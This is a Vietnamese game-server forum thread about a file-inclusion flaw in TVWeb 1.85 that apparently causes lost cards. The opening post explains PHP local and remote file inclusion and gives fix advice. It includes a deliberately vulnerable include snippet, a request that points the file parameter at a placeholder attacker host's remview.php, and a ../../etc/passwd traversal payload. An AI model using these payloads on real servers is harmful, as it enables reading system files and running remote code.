Kết quả 1 đến 10 của 56
-
22-07-11, 01:28 PM #1
Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
Lỗi ở file server/log/index.php
Lỗi file local inclusion
2- Include local file:
Loại này cũng gần giống như include remote file. Nhưng nó khác ở chổ: biến chứa tên file bị giới hạn bởi một thư mục đứng trước nó.
Vd: Một file bị lỗi include local file có dạng như sau:
---------BEGIN of test3.php-------
CODE <?php
include(“/home/$file”);
[…]
?>
----------END of test3.php---------
Xin chú ý là biến $file chưa được khai báo.
Nếu ta dùng:
[Only registered and activated users can see links. ] ([Only registered and activated users can see links. ]).[target].com/test3.php?file=http://www.[attacker].com/remview.php
Thì trong code của file test3.php sẽ trở thành như sau:
---------BEGIN of test3.php-------
CODE <?php
include(“/home/http://www.[attacker].com/remview.php”);
[…]
?>
----------END of test3.php---------
Một đường dẫn vô nghĩa. Do đó ta không thể include được file ta muốn.
Bấy giờ ta chỉ có thể sử dụng cách sau:
[Only registered and activated users can see links. ] ([Only registered and activated users can see links. ]).[target].com/test3.php?file=../../../../../../../../etc/passwd
Link trên đã khai báo biến $file với giá trị là: “../../../../../../../../etc/passwd”. Lúc này code của file test3.php có dạng:
---------BEGIN of test3.php-------
CODE <?php
include(“/home/../../../../../../../../etc/passwd”);
[…]
?>
----------END of test3.php---------
Các kí tự : “../../” đã giúp ta vượt qua các cấp thư mục trở về thư mục gốc”/” (đối với Linux) và sau đó là include file /etc/passwd. Thế là toàn bộ nội dung file passwd sẽ được hiển thị trên trình duyệt của attacker. Ta có thể thay thế /etc/passwd bằng bất cứ file nào ta muốn include (+xem). Xin chú ý: càng dùng nhiều kí tự “../” càng tốt vì nó sẽ đảm bảo đưa ta đến thư mục gốc.
II- Khắc phục:
Khắc hục lỗi file include này theo tớ là đơn giản hơn fix các lỗi khác nhiều.
Nếu sản phẩm bạn code chưa mắc lỗi hay đã này thì tôi xin khuyên bạn vài điều để hạn chế việc mắc phải lỗi này.
+ Hạn chế dùng các biến trong các hàm (include và require), nếu đã dùng nên đảm bảo các biến đó đã được khai báo đầy đủ và chính xác. Nếu bạn vẫn thích dùng biến thay thế cho đường dẫn thì tại sao bạn không dùng hàm define() nhỉ? Hàm này không cho phép user khai báo từ bên ngoài, hoặc bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).
+ Hạn chế việc khai báo biến phụ thuộc vào nguời dùng cuối như ở Vd 2. Nên khai báo trực tiếp biến đó.Lần sửa cuối bởi thecong, ngày 30-07-11 lúc 11:55 AM.
Ký cái gì?
-
-
22-07-11, 01:38 PM #2
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
Ây za anh em gà mà bác cứ úp mở
Nói toẹt ra xem nàoSTRONGEST MAN
-
22-07-11, 01:45 PM #3
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
! Hình như kết nối được với Port của SQL là Port 443 hay sao ấy ??
Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
22-07-11, 01:59 PM #4
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
Lỗi file inclussion là lỗi có thể điều khiển file từ xa ( nói nôm na là như thế)
lỗi cụ thể ở file server/log/index.php
PHP]Lần sửa cuối bởi thecong, ngày 23-07-11 lúc 12:23 AM.
Ký cái gì?
-
Các thành viên gởi lời cảm ơn đến thecong vì bài viết này !
mrrainnt (22-07-11)
-
22-07-11, 02:07 PM #5
- Ngày tham gia
- Apr 2011
- Đang ở
- nhà
- Bài viết
- 58
- Thanks
- 11
- Thanked 14 Times in 8 Posts
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
đổi tên thư mục server đi thì làm sao ? ,
Khách viếng thăm hãy cùng nguvadot xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
22-07-11, 02:15 PM #6
-
22-07-11, 02:54 PM #7
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
đổi tên củng không có tác dụng!
hẹn ngày trở lại,hoặc giả từ vũ khí !^!^
-
22-07-11, 03:13 PM #8
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
Đã nêu ra lỗi kia rùi mà, tớ bổ sung thêm đầy đủ lun nhá các cậu vào đây để đọc về lỗi này chính xác nó là local file inclusion
có 2 loại lỗi liên qua đến file inclussion đó là 1 lỗi về remote include nữa, lỗi này FW bị nè, hồi trước đi nghịch mấy site Mu hoài dọa chơi ý màKý cái gì?
-
22-07-11, 03:36 PM #9
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
! Xóa code đi có được không nhỉ hay cũng không có tác dụng luôn
Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
22-07-11, 03:37 PM #10
Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85
cái này fix thôi cần gì xóa.............................................. ...
Ký cái gì?
Các Chủ đề tương tự
-
Cần giúp đỡ về TVWeb 1.85
Bởi kunyeudung trong diễn đàn Hỏi Đáp/ Yêu CầuTrả lời: 4Bài viết cuối: 25-08-11, 02:45 AM -
Lỗi bảng xếp hạng tháng TVWeb 1.85
Bởi whylove trong diễn đàn Hỏi Đáp/ Yêu CầuTrả lời: 4Bài viết cuối: 16-08-11, 08:57 PM -
Help TVWEB 1.85
Bởi gauandy trong diễn đàn Hỏi Đáp/ Yêu CầuTrả lời: 3Bài viết cuối: 21-06-11, 08:17 AM -
Lỗi Web TVweb 1.67
Bởi daiuycong trong diễn đàn Hỏi Đáp/ Yêu CầuTrả lời: 3Bài viết cuối: 16-11-10, 05:38 PM -
Cần Giúp Về TVWeb
Bởi daiuycong trong diễn đàn Hỏi Đáp/ Yêu CầuTrả lời: 0Bài viết cuối: 07-11-10, 01:36 PM